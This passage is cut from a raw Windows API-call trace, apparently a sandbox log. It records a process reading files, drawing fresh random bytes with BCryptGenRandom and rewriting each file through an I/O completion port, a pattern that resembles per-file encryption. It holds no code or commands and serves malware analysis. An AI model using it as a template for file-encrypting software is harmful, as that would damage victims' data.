lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1028, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0141.615] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.628] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2a64, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.640] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.645] CloseHandle (hObject=0x170) returned 1 [0141.645] free (_Block=0x3df0008) [0141.645] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.646] CloseHandle (hObject=0x308) returned 1 [0141.646] free (_Block=0x3ef0008) [0141.646] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.679] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1984, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0141.680] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.693] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1094, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.693] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.694] CloseHandle (hObject=0x338) returned 1 [0141.694] free (_Block=0x3df0008) [0141.694] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.710] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.710] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.710] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0141.710] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.714] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.714] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0141.714] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.714] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.714] free (_Block=0x3e305b8) [0141.714] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.714] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.715] free (_Block=0x1fa91d0) [0141.715] free (_Block=0x77d7a8) [0141.715] free (_Block=0x1fa90b8) [0141.715] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.715] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.716] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x13e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.716] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.717] CloseHandle (hObject=0x338) returned 1 [0141.717] free (_Block=0x3df0008) [0141.717] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.726] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.726] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.727] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0141.727] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.728] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0141.729] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.729] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.729] free (_Block=0x3e305b8) [0141.729] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.729] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.729] free (_Block=0x1fa91d0) [0141.729] free (_Block=0x77d7a8) [0141.729] free (_Block=0x1fa90b8) [0141.731] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.731] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.732] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x5c80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.732] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.741] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1f1c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.742] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.742] CloseHandle (hObject=0x338) returned 1 [0141.742] free (_Block=0x3df0008) [0141.742] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.750] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.750] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.750] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0141.750] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.751] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.751] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0141.751] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.751] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.751] free (_Block=0x3e305b8) [0141.751] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.751] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.751] free (_Block=0x1fa91d0) [0141.751] free (_Block=0x77d7a8) [0141.751] free (_Block=0x1fa90b8) [0141.751] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.751] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.752] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x40d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.753] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.753] CloseHandle (hObject=0x338) returned 1 [0141.753] free (_Block=0x3df0008) [0141.753] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.760] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.760] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.761] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0141.761] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.761] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.761] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0141.761] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.761] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.761] free (_Block=0x3e305b8) [0141.761] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.761] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.761] free (_Block=0x1fa91d0) [0141.762] free (_Block=0x77d7a8) [0141.762] free (_Block=0x1fa90b8) [0141.762] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.762] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.763] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2cf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.763] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.764] CloseHandle (hObject=0x338) returned 1 [0141.764] free (_Block=0x3df0008) [0141.764] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.774] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.776] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0141.778] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.780] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0141.787] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.787] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.787] free (_Block=0x3e305b8) [0141.787] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.787] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.788] free (_Block=0x1fa91d0) [0141.788] free (_Block=0x77d7a8) [0141.788] free (_Block=0x1fa90b8) [0141.788] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.788] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.789] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7680, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.790] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.791] CloseHandle (hObject=0x338) returned 1 [0141.791] free (_Block=0x3df0008) [0141.791] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.804] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.806] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.806] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0141.806] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.807] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0141.810] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.810] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.810] free (_Block=0x3e305b8) [0141.810] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.810] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.811] free (_Block=0x1fa91d0) [0141.811] free (_Block=0x77d7a8) [0141.811] free (_Block=0x1fa90b8) [0141.811] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.811] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.816] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1340, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.817] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.845] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x52e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.846] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.846] CloseHandle (hObject=0x338) returned 1 [0141.846] free (_Block=0x3df0008) [0141.846] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.856] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.857] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.857] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0141.857] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.857] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.857] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0141.858] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.858] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.858] free (_Block=0x3e305b8) [0141.858] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.858] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.858] free (_Block=0x1fa91d0) [0141.858] free (_Block=0x77d7a8) [0141.858] free (_Block=0x1fa90b8) [0141.858] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.859] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.859] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.859] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.871] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xdf0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.871] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.871] CloseHandle (hObject=0x338) returned 1 [0141.871] free (_Block=0x3df0008) [0141.871] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.907] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.908] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0141.908] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.908] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0141.909] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.909] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.909] free (_Block=0x3e305b8) [0141.909] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.909] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.909] free (_Block=0x1fa91d0) [0141.909] free (_Block=0x77d7a8) [0141.909] free (_Block=0x1fa90b8) [0141.909] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.910] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.911] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2590, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.911] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.937] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1788, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.942] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.952] CloseHandle (hObject=0x338) returned 1 [0141.952] free (_Block=0x3df0008) [0141.952] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0141.962] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xbe0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0141.962] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0142.009] CloseHandle (hObject=0x338) returned 1 [0142.009] free (_Block=0x3df0008) [0142.009] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | 